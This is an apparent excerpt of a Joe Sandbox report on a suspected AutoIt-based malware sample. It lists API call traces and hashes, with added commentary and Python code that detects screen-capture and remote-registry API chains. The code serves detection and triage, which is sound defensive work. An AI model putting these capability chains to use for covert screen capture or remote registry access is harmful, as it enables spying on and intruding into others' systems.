                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007C8C25
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007C8C35
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                          • String ID: ,,~
                                                                                                          • API String ID: 2395222682-1083855107
                                                                                                          • Opcode ID: 529cef7bf7191b2d4e8bbee020a0ab03726badb3e953ece39431c3f638c69b53
                                                                                                          • Instruction ID: 9bd1c3179675e0c810f0b5e7b183e1140b8aae052fdfb87ca13e85d3e70ffe33
                                                                                                          • Opcode Fuzzy Hash: 529cef7bf7191b2d4e8bbee020a0ab03726badb3e953ece39431c3f638c69b53
                                                                                                          • Instruction Fuzzy Hash: 25C104B1608305EFC740DF64C884E6AB7E9BF89348F00495DF98A9B261DB75ED05CB62
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          • _memset.LIBCMT ref: 007A786B
                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007A78A0
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007A78BC
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007A78D8
                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007A7902
                                                                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007A792A
                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007A7935
                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007A793A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                          • API String ID: 1411258926-22481851
                                                                                                          • Opcode ID: f8f13e406d6ccf1706f30f6fa730838f6a07cdd409d866b83d40f08167bdb2c5
                                                                                                          • Instruction ID: f131421df3ce6f81f23e92cf7e700bf864071676ae4681b1baf0552d3655d80d
                                                                                                          • Opcode Fuzzy Hash: f8f13e406d6ccf1706f30f6fa730838f6a07cdd409d866b83d40f08167bdb2c5
                                                                                                          • Instruction Fuzzy Hash: CD411A72C14229EBCF15EB94EC49DEEB778FF04351F40452AE815A3161DB786D08CBA0
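Two of the function listings in this section carry the API sequences that the report's behavioural signatures key on: the GetDC / CreateCompatibleBitmap / CreateCompatibleDC / SelectObject / StretchBlt / GetDIBits chain further up (screen capture into a device-independent bitmap) and the WNetAddConnection2W / RegConnectRegistryW / RegOpenKeyExW / RegQueryValueExW / CLSIDFromString chain directly above (connect to a host's IPC$ share, open its HKEY_LOCAL_MACHINE hive remotely and resolve a CLSID under SOFTWARE\Classes). The matcher below is an added example written for this page, not part of the Joe Sandbox report or of any vendor tooling. It parses lines in the listing's own format and checks for each chain as an ordered subsequence. The A/W name pairs and BitBlt are added as a generalization beyond the two entries shown; the input lines are copied from those entries; the hive constant 80000002 (HKEY_LOCAL_MACHINE) and access mask 00020019 (KEY_READ) are the documented Win32 values.

```python
"""Match ordered Win32 API chains in Joe Sandbox function listings."""
import re

# "• Name.MODULE(args), ref: ADDR" or "• Part of subcall function X: Name.MODULE ref: ADDR"
CALL_RE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
)

HKEY_LOCAL_MACHINE = "80000002"   # documented predefined-key handle value
KEY_READ = "00020019"             # documented registry access mask

# Each step is a set of acceptable API names; steps must occur in this order,
# any other calls may appear between them.
PATTERNS = {
    "screen_capture": [
        {"GetDC", "GetWindowDC"}, {"CreateCompatibleBitmap"},
        {"CreateCompatibleDC"}, {"SelectObject"},
        {"StretchBlt", "BitBlt"}, {"GetDIBits"},
    ],
    "remote_registry": [
        {"WNetAddConnection2W", "WNetAddConnection2A"},
        {"RegConnectRegistryW", "RegConnectRegistryA"},
        {"RegOpenKeyExW", "RegOpenKeyExA"},
        {"RegQueryValueExW", "RegQueryValueExA"},
    ],
}


def parse_trace(lines):
    """Turn listing lines into dicts with api, module, args and a subcall flag."""
    calls = []
    for line in lines:
        m = CALL_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({
            "api": m.group("api"),
            "mod": m.group("mod"),
            "args": raw.split(",") if raw is not None else [],
            "subcall": m.group("sub") is not None,
        })
    return calls


def matches_in_order(calls, pattern):
    """True if every step of `pattern` is hit in sequence by `calls`."""
    step = 0
    for c in calls:
        if c["api"] in pattern[step]:
            step += 1
            if step == len(pattern):
                return True
    return False


def remote_hive(calls):
    """Predefined hive handle passed to RegConnectRegistry, or None."""
    for c in calls:
        if c["api"].startswith("RegConnectRegistry") and len(c["args"]) >= 2:
            return c["args"][1]
    return None


def classify(lines):
    """Names of every pattern the listing satisfies."""
    calls = parse_trace(lines)
    return {name for name, pat in PATTERNS.items() if matches_in_order(calls, pat)}


# Input copied from the two report entries on this page.
SCREEN_TRACE = [
    "• GetDC.USER32(00000000), ref: 007C738F",
    "• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007C739B",
    "• CreateCompatibleDC.GDI32(?), ref: 007C73A7",
    "• SelectObject.GDI32(00000000,?), ref: 007C73B4",
    "• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007C7408",
    "• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007C7444",
    "• ReleaseDC.USER32(00000000,?), ref: 007C748B",
]
REMOTE_TRACE = [
    "• Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06",
    "• _memset.LIBCMT ref: 007A786B",
    "• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007A78A0",
    "• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007A78BC",
    r"• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007A78D8",
    r"• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007A7902",
    r"• CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007A792A",
]

if __name__ == "__main__":
    print(classify(SCREEN_TRACE), classify(REMOTE_TRACE), remote_hive(parse_trace(REMOTE_TRACE)))
```

These listings come from the IDA plugin pass over the memory dump, so they are static: a match says the interpreter stub contains the capability (both chains are standard AutoIt runtime routines, screen capture and reading a key on a remote computer by name), not that the script in this sample invoked it. The dynamic evidence is what the report's behaviour signatures and network traffic sections record.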
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0078E2A0,00000010,?,Bad directive syntax error,007DF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007AF7C2
                                                                                                          • LoadStringW.USER32(00000000,?,0078E2A0,00000010), ref: 007AF7C9
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • _wprintf.LIBCMT ref: 007AF7FC
                                                                                                          • __swprintf.LIBCMT ref: 007AF81E
                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007AF88D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                          • API String ID: 1506413516-4153970271
                                                                                                          • Opcode ID: b356304d06818ea462d544406de458bc15dc8da4c870f80db0b4f51a58442efc
                                                                                                          • Instruction ID: 5cc9c65784e160f2b7fb9ba79f643fa6be37c8611a21139ec614707ea94373b5
                                                                                                          • Opcode Fuzzy Hash: b356304d06818ea462d544406de458bc15dc8da4c870f80db0b4f51a58442efc
                                                                                                          • Instruction Fuzzy Hash: A421913190021DEBCF15EF90CC0AEED7738FF18301F044866F915661A2EA79A658DB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                            • Part of subcall function 00757924: _memmove.LIBCMT ref: 007579AD
                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007B5330
                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007B5346
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007B5357
                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007B5369
                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007B537A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$_memmove
                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                          • API String ID: 2279737902-1007645807
                                                                                                          • Opcode ID: 64febce3c70100c9df30334ca3bfc09e523d8b941b3f8c56e3008c3937733681
                                                                                                          • Instruction ID: 0ee5dec326bfb8a66dc5b511fbd98d129cb67780abbe27e3c1937b252480b8fd
                                                                                                          • Opcode Fuzzy Hash: 64febce3c70100c9df30334ca3bfc09e523d8b941b3f8c56e3008c3937733681
                                                                                                          • Instruction Fuzzy Hash: E411B261A50129B9D764B661DC4EEFF7BBCFB92B44F000429B821E21D1DEF81D48C5B0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                          • String ID: 0.0.0.0
                                                                                                          • API String ID: 208665112-3771769585
                                                                                                          • Opcode ID: ca9f2288d33561e94b637d2da1a87882bafa393c4e8f3075b843e5a702c53702
                                                                                                          • Instruction ID: 6c868d4bb338fac038fad6248184b968a5a19bda3e8697c669d9cfd489b7f85a
                                                                                                          • Opcode Fuzzy Hash: ca9f2288d33561e94b637d2da1a87882bafa393c4e8f3075b843e5a702c53702
                                                                                                          • Instruction Fuzzy Hash: A111D531500114EFCB20AB309C4AFEA77BCEB02721F0481B6F45A96192EF7D9A81C665
                                                                                                          APIs
                                                                                                          • timeGetTime.WINMM ref: 007B4F7A
                                                                                                            • Part of subcall function 0077049F: timeGetTime.WINMM(?,75A8B400,00760E7B), ref: 007704A3
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 007B4FA6
                                                                                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 007B4FCA
                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007B4FEC
                                                                                                          • SetActiveWindow.USER32 ref: 007B500B
                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007B5019
                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 007B5038
                                                                                                          • Sleep.KERNEL32(000000FA), ref: 007B5043
                                                                                                          • IsWindow.USER32 ref: 007B504F
                                                                                                          • EndDialog.USER32(00000000), ref: 007B5060
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                          • String ID: BUTTON
                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                          • Opcode ID: ea748c286fcb1d859f21acb2ee54071b7d835c4814cb0ec4fc32974bd8f80821
                                                                                                          • Instruction ID: db60c69e7eadb4619d68ddbb9bf304aacba7a380f71d3abf1c8f1917e41ea57b
                                                                                                          • Opcode Fuzzy Hash: ea748c286fcb1d859f21acb2ee54071b7d835c4814cb0ec4fc32974bd8f80821
                                                                                                          • Instruction Fuzzy Hash: 16216D71206605EFE7106F30ED89BE63B7EFF45745B089025F146821B1EB798D608A66
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • CoInitialize.OLE32(00000000), ref: 007BD5EA
                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007BD67D
                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 007BD691
                                                                                                          • CoCreateInstance.OLE32(007E2D7C,00000000,00000001,00808C1C,?), ref: 007BD6DD
                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007BD74C
                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 007BD7A4
                                                                                                          • _memset.LIBCMT ref: 007BD7E1
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 007BD81D
                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007BD840
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 007BD847
                                                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007BD87E
                                                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 007BD880
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1246142700-0
                                                                                                          • Opcode ID: d102ac0595bcd0883d19221fd41017d3f68a3b914c9974226af711600eb39224
                                                                                                          • Instruction ID: 386308a7a8a650c751cdefbe830f06d192869a0f8ea1b99da44435387d79d4df
                                                                                                          • Opcode Fuzzy Hash: d102ac0595bcd0883d19221fd41017d3f68a3b914c9974226af711600eb39224
                                                                                                          • Instruction Fuzzy Hash: 62B1FA75A00109EFDB14DFA4C888EAEBBB9FF48314B148469F90ADB261DB34ED45CB50
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 007AC283
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007AC295
                                                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007AC2F3
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 007AC2FE
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007AC310
                                                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007AC364
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 007AC372
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007AC383
                                                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007AC3C6
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 007AC3D4
                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007AC3F1
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 007AC3FE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3096461208-0
                                                                                                          • Opcode ID: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                                                                                                          • Instruction ID: e412933b1eb13e49cf6f39c193fb8d4688135b3278e996b914686f3e5612ec85
                                                                                                          • Opcode Fuzzy Hash: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                                                                                                          • Instruction Fuzzy Hash: 26513171B00205BBDF18CFA9DD95AAEBBB5EB88711F14C12DF516D6290D7749D008B14
                                                                                                          APIs
                                                                                                            • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                                                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007520D3
                                                                                                          • KillTimer.USER32(-00000001,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0075216E
                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0078BCA6
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BCD7
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BCEE
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BD0A
                                                                                                          • DeleteObject.GDI32(00000000), ref: 0078BD1C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 641708696-0
                                                                                                          • Opcode ID: 18540fe15d4ecd3621c367ff108e342a05b52224f6e0094c255af1b42b2b384d
                                                                                                          • Instruction ID: a0e34f31b08314948be341f1c2a71df8b69b3ac621855a08d35a4c1f8fdeeb2f
                                                                                                          • Opcode Fuzzy Hash: 18540fe15d4ecd3621c367ff108e342a05b52224f6e0094c255af1b42b2b384d
                                                                                                          • Instruction Fuzzy Hash: 43618031611A00DFCB35AF14D948BA6B7F1FF81313F508429E946879B1C7B8A896DB60
                                                                                                          APIs
                                                                                                            • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                          • GetSysColor.USER32(0000000F), ref: 007521D3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ColorLongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 259745315-0
                                                                                                          • Opcode ID: e1aa3530324bc9d580effc32c9271d4a864e160e203e9cd749df1b2533ea505d
                                                                                                          • Instruction ID: 98d14ba4563649b9a67c77efbb77360e64ee6694d74f7ac374d7373720c737a3
                                                                                                          • Opcode Fuzzy Hash: e1aa3530324bc9d580effc32c9271d4a864e160e203e9cd749df1b2533ea505d
                                                                                                          • Instruction Fuzzy Hash: 5A419235101544DEDB215F28DC88BF93B65FB07332F158266FE668A1E2C77A8C46DB21
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?,007DF910), ref: 007BA90B
                                                                                                          • GetDriveTypeW.KERNEL32(00000061,008089A0,00000061), ref: 007BA9D5
                                                                                                          • _wcscpy.LIBCMT ref: 007BA9FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                          • API String ID: 2820617543-1000479233
                                                                                                          • Opcode ID: 441899b11ab6ea769bfa650bff08afe2aa0ad1b5348297b07d3aef1d5b35208b
                                                                                                          • Instruction ID: 1370d74e98239475cc951dc2b17c6e846e5144a7ce8d7e6e9c6c95fe71f66899
                                                                                                          • Opcode Fuzzy Hash: 441899b11ab6ea769bfa650bff08afe2aa0ad1b5348297b07d3aef1d5b35208b
                                                                                                          • Instruction Fuzzy Hash: 64519F31508301EBC704EF14C896BEFB7A5FF84740F15882DF995972A2DB79A909CA93
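The function records printed here (API calls with their `ref:` addresses, optional "Part of subcall function" callers, the `$`-joined String ID, the two-part API String ID and the opcode/instruction fuzzy hashes under Similarity) are easier to triage when parsed than when read by eye. The Python below is an added example, not Joe Sandbox's or the IDA plugin's own code: it parses records in exactly the layout used on this page into structured objects and indexes them on the report's Opcode Fuzzy Hash, so a function seen here can be recognised if it appears in another sample's report. The sample input is two records copied from this page with the indentation dropped. It assumes, as holds in this extract, that every record begins with its `APIs` heading; the entries under `Strings` are absent from the extract and so are not parsed.

```python
"""Parse Joe Sandbox IDA Plugin function records into structured entries.
Added example for this report; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from this report, indentation removed.
SAMPLE = """\
APIs
• Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
• GetSysColor.USER32(0000000F), ref: 007521D3
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
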